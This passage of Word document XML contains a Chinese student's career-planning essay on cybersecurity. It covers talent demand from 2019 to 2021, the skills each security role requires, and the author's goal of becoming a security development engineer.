          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>网络安全行业至2021年仍然有100万的缺口，近3年网络安全人才市场需求高速增长，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>2021年上半年增幅高达39.87%，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>由此反应了网络安全在各行业渗透比例逐渐提升。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F65E5E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left"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5759450" cy="2188845"/>
            <wp:effectExtent l="0" t="0" r="6350" b="825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759450" cy="2188845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290303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2019年-2021年网络安全行业人才需求同比增长</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1CC7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（图一）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2694A1B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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这幅图片是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2019年-2021年上半年网络安全行业人才总体的供需变化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，2020年受到疫情影响，而2019年和2021年网安行业的人才需求，较前一年同期相比，增幅显著，尤其是复工复产的后疫情时代，伴随着国内经济高速回温，企业对网络安全人才的需求也随之升温2021年上半年增幅高达39.87%，反映了网络安全在各行业的渗透率全面提高,在人才需求结构中的重要性显著上升。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75138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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>随着互联网的发展，网络形势日益严峻，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>各国政府纷纷出台网络安全相关的法律法规，要求企业和组织加强网络安全建设，定期进行安全评估。这些政策法规的出台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>推动了网络安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>岗位的需求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BCBA9">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643" w:firstLineChars="200"/>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网络安全岗位技能要求分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8276B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643" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094E74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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，无论是哪种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络安全岗位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
        </w:rPr>
        <w:t>具备扎实的网络安全理论基础</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其次再根据职务的不同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，不同的网络安全岗位对职员的技能和能力的要求也不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51423FF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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络安全评估岗位不仅要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
        </w:rPr>
        <w:t>熟悉各种网络攻击手段、防御技术和安全漏洞原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还得具备沟通协商以及安全策略制定的能力；网络安全开发岗位则要求具备优秀的代码编写能力，精通计算机原理，熟练掌握各种安全技术与工具；而网络安全运维岗位不仅要熟练掌握技术，还要具备团队合作能力，以解决网络安全问题；网络安全应急岗位要求具备应急响应能力，即使分析和解决问题；网络安全测试还要求一定的撰写报告与沟通能力；网络安全咨询岗位则一定有优秀的专业知识和表达能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDBF11E">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firstLine="643" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我的职业规划和发展目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF2BD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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经过一下午的调研和资料搜集，对网络安全的各个岗位主要针对其就业前景，技能需求和发展方向有了一个大致的了解。首先要对自己的各方面能力有一个比较清晰的认知，然后才能找到适合自己的职业岗位。经过一年的大学学习，我认为我对理论知识不反感，并且对计算机原理充满兴趣，其次，我发先我并不缺乏实际动手能力，在相当了解原理的情况下也能精准解决问题。再一个就是文字能力只能说是一般水准，有待提高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E763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5753100" cy="2365375"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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753100" cy="2365375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF891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我的职业规划和发展目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6688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（图二）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD1CE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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为了解到安全开发岗位对文字沟通要求较少，以及其要求对电脑知识的掌握，所以我认为从事安全开发工程师会比较适合我。选择这份职业首先在大学学本事打基础阶段要学好理论知识，以及掌握相关计算机编程语言，还要掌握网络安全工具的应用。在毕业开始工作后，不断通过参与网络安全项目，提高解决安全问题的能力，同时深化专业知识，不断巩固和深化网络安全的基本知识，在此期间还要不断学习，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
        </w:rPr>
        <w:t>保持对新技术、新趋势的敏感性和学习能力，通过参加培训、阅读专业书籍和文章等方式，不断提升自己的综合素质。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由开始的新手小白，逐渐发展到能够负责部分自己研发的工作，再积极争取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
        </w:rPr>
        <w:t>深入参与公司安全平台搭建的调研和开发，提升产品的安全性和稳定性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在这个过程中还要锻炼文字沟通能力，表达能力，逐渐培养到能够</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
        </w:rPr>
        <w:t>主导公司安全产品的研发方向，制定产品路线图，确保产品能够满足市场需求并具备竞争优势。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这就是我对于未来十年甚至二十年的职业规划和发展目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2036EEF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480" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FDFDFE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F68B2E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firstLine="643" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61CF3F4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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
